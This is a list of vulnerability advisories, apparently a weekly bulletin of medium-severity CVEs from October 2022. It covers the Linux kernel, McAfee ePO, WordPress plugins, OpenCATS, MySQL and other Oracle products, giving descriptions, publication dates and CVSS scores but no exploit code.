linux — linux_kernel	A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is an unknown function of the file mm/memory.c of the component Driver Handler. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211020.	2022-10-16	5.3	CVE-2022-3523 MISC MISC
linux — linux_kernel	A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function l2cap_recv_acldata of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211918 is the identifier assigned to this vulnerability.	2022-10-20	4.3	CVE-2022-3619 N/A N/A
mcafee — epolicy_orchestrator	A reflected cross-site scripting (XSS) vulnerability in ePO prior to 5.10 Update 14 allows a remote unauthenticated attacker to potentially obtain access to an ePO administrator’s session by convincing the authenticated ePO administrator to click on a carefully crafted link. This would lead to limited access to sensitive information and limited ability to alter some information in ePO.	2022-10-18	6.1	CVE-2022-3339 CONFIRM
mcafee — epolicy_orchestrator	An External XML entity (XXE) vulnerability in ePO prior to 5.10 Update 14 can lead to an unauthenticated remote attacker to potentially trigger a Server Side Request Forgery attack. This can be exploited by mimicking the Agent Handler call to ePO and passing the carefully constructed XML file through the API.	2022-10-18	5.4	CVE-2022-3338 CONFIRM
mekshq — meks_easy_social_share	The Meks Easy Social Share WordPress plugin before 1.2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)	2022-10-17	4.8	CVE-2022-2574 MISC
mindskip — xzs	xzs v3.8.0 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /admin/question/edit. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title text field.	2022-10-17	5.4	CVE-2022-41431 MISC MISC MISC MISC
miniorange — discord_integration	The miniOrange Discord Integration WordPress plugin before 2.1.6 does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example	2022-10-17	6.5	CVE-2022-3082 MISC
mitre — caldera	MITRE CALDERA before 4.1.0 allows XSS in the Operations tab and/or Debrief plugin via a crafted operation name, a different vulnerability than CVE-2022-40606.	2022-10-17	6.1	CVE-2022-40605 MISC
mitre — caldera	MITRE CALDERA before 4.1.0 allows XSS in the Operations tab and/or Debrief plugin via a crafted operation name, a different vulnerability than CVE-2022-40605.	2022-10-17	6.1	CVE-2022-40606 MISC
mitre — caldera	MITRE CALDERA 4.1.0 allows stored XSS via app.contact.gist (aka the gist contact configuration field), leading to execution of arbitrary commands on agents.	2022-10-17	5.4	CVE-2022-41139 MISC
najeebmedia — frontend_file_manager_plugin	The Frontend File Manager Plugin WordPress plugin before 21.4 does not have CSRF check when uploading files, which could allow attackers to make logged in users upload files on their behalf	2022-10-17	4.3	CVE-2022-3126 MISC
nopcommerce — nopcommerce	Multiple open redirect vulnerabilities in NopCommerce 4.10 through 4.50.1 allow remote attackers to conduct phishing attacks by redirecting users to attacker-controlled web sites via the returnUrl parameter, processed by the (1) ChangePassword function, (2) SignInCustomerAsync function, (3) SuccessfulAuthentication method, or (4) NopRedirectResultExecutor class.	2022-10-20	6.1	CVE-2022-26954 MISC MISC
octoprint — octoprint	Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in GitHub repository octoprint/octoprint prior to 1.8.3.	2022-10-19	6	CVE-2022-3607 CONFIRM MISC
online_birth_certificate_management_system_project — online_birth_certificate_management_system	Online Birth Certificate Management System version 1.0 suffers from a Cross Site Scripting (XSS) Vulnerability.	2022-10-14	6.1	CVE-2022-42071 MISC MISC
online_birth_certificate_management_system_project — online_birth_certificate_management_system	Online Birth Certificate Management System version 1.0 suffers from an Insecure Direct Object Reference (IDOR) vulnerability	2022-10-14	4.3	CVE-2022-42067 MISC MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag update function.	2022-10-19	6.5	CVE-2022-43020 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the entriesPerPage variable.	2022-10-19	6.5	CVE-2022-43021 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag deletion function.	2022-10-19	6.5	CVE-2022-43022 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the importID parameter in the Import viewerrors function.	2022-10-19	6.5	CVE-2022-43023 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.	2022-10-19	6.1	CVE-2022-43014 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage parameter.	2022-10-19	6.1	CVE-2022-43015 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback component.	2022-10-19	6.1	CVE-2022-43016 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component.	2022-10-19	6.1	CVE-2022-43017 MISC
opencats — opencats	OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the email parameter in the Check Email function.	2022-10-19	6.1	CVE-2022-43018 MISC
opencrx — opencrx	OpenCRX before v5.2.2 was discovered to be vulnerable to password enumeration due to the difference in error messages received during a password reset which could enable an attacker to determine if a username, email or ID is valid.	2022-10-20	5.3	CVE-2022-40084 MISC MISC
openharmony — openharmony	OpenHarmony-v3.1.2 and prior versions, 3.0.6 and prior versions have an Out-of-bound memory read and write vulnerability in /dev/mmz_userdev device driver. The impact depends on the privileges of the attacker. The unprivileged process run on the device could read out-of-bound memory leading sensitive to information disclosure. The processes with system user UID run on the device would be able to write out-of-bound memory which could lead to unspecified memory corruption.	2022-10-14	4.4	CVE-2022-41686 MISC
oracle — access_manager	Vulnerability in the Oracle Access Manager product of Oracle Fusion Middleware (component: Authentication Engine). The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Access Manager. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Access Manager accessible data. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).	2022-10-18	5.3	CVE-2022-39405 MISC
oracle — applications_framework	Vulnerability in the Oracle Applications Framework product of Oracle E-Business Suite (component: Session Management). Supported versions that are affected are 12.2.6-12.2.11. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Applications Framework accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).	2022-10-18	6.5	CVE-2022-21636 MISC
oracle — business_intelligence	Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Server). The supported version that is affected is 5.9.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N).	2022-10-18	5.7	CVE-2022-21609 MISC
oracle — communications_billing_and_revenue_management	Vulnerability in the Oracle Communications Billing and Revenue Management product of Oracle Communications Applications (component: Connection Manager). Supported versions that are affected are 12.0.0.4.0-12.0.0.7.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Communications Billing and Revenue Management. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Communications Billing and Revenue Management accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Communications Billing and Revenue Management. CVSS 3.1 Base Score 6.5 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L).	2022-10-18	6.5	CVE-2022-21601 MISC
oracle — database_server	Vulnerability in the Oracle Services for Microsoft Transaction Server component of Oracle Database Server. The supported version that is affected is 19c. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Services for Microsoft Transaction Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Services for Microsoft Transaction Server, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Services for Microsoft Transaction Server accessible data as well as unauthorized read access to a subset of Oracle Services for Microsoft Transaction Server accessible data. Note: This vulnerability applies to Windows systems only. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2022-10-18	6.1	CVE-2022-21606 MISC
oracle — graalvm	Vulnerability in the Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaScript). Supported versions that are affected are Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM Enterprise Edition accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).	2022-10-18	5.3	CVE-2022-21597 MISC
oracle — graalvm	Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JGSS). Supported versions that are affected are Oracle Java SE: 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via Kerberos to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).	2022-10-18	5.3	CVE-2022-21618 MISC
oracle — graalvm	Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).	2022-10-18	5.3	CVE-2022-21626 MISC
oracle — graalvm	Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Lightweight HTTP Server). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).	2022-10-18	5.3	CVE-2022-21628 MISC
oracle — java_virtual_machine	Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Easily exploitable vulnerability allows low privileged attacker having Create Procedure privilege with network access via Oracle Net to compromise Java VM. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java VM accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).	2022-10-18	4.3	CVE-2022-39419 MISC
oracle — jd_edwards_enterpriseone_tools	Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.6.4 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2022-10-18	6.1	CVE-2022-21630 MISC
oracle — jd_edwards_enterpriseone_tools	Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Design Tools SEC). Supported versions that are affected are 9.2.6.4 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2022-10-18	6.1	CVE-2022-21631 MISC
oracle — jd_edwards_enterpriseone_tools	Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Web Runtime SEC). Supported versions that are affected are 9.2.6.4 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise JD Edwards EnterpriseOne Tools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in JD Edwards EnterpriseOne Tools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of JD Edwards EnterpriseOne Tools accessible data as well as unauthorized read access to a subset of JD Edwards EnterpriseOne Tools accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).	2022-10-18	5.4	CVE-2022-21629 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H).	2022-10-18	6.5	CVE-2022-21635 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	6.5	CVE-2022-39408 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	6.5	CVE-2022-39410 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21594 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21599 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21604 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Data Dictionary). Supported versions that are affected are 8.0.28 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21605 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.28 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21607 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.39 and prior and 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21608 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Connection Handling). Supported versions that are affected are 5.7.39 and prior and 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21617 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21632 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21633 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21637 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21638 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21640 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.29 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-21641 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.9	CVE-2022-39400 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: C API). Supported versions that are affected are 5.7.36 and prior and 8.0.27 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.4	CVE-2022-21595 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.30 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.4	CVE-2022-21625 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 5.7.39 and prior and 8.0.16 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).	2022-10-18	4.3	CVE-2022-21589 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.7.39 and prior and 8.0.29 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).	2022-10-18	4.3	CVE-2022-21592 MISC
oracle — mysql	Vulnerability in the MySQL Shell product of Oracle MySQL (component: Shell: Core Client). Supported versions that are affected are 8.0.30 and prior. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Shell executes to compromise MySQL Shell. While the vulnerability is in MySQL Shell, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Shell accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N).	2022-10-18	4.3	CVE-2022-39402 MISC
oracle — mysql	Vulnerability in the MySQL Installer product of Oracle MySQL (component: Installer: General). Supported versions that are affected are 1.6.3 and prior. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Installer executes to compromise MySQL Installer. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Installer accessible data as well as unauthorized read access to a subset of MySQL Installer accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Installer. CVSS 3.1 Base Score 4.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L).	2022-10-18	4.2	CVE-2022-39404 MISC
oracle — mysql	Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.30 and prior. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).	2022-10-18	4.1	CVE-2022-21611 MISC
oracle — peoplesoft_enterprise	Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Elastic Search Integration). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in PeopleSoft Enterprise PeopleTools, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).	2022-10-18	6.1	CVE-2022-21639 MISC
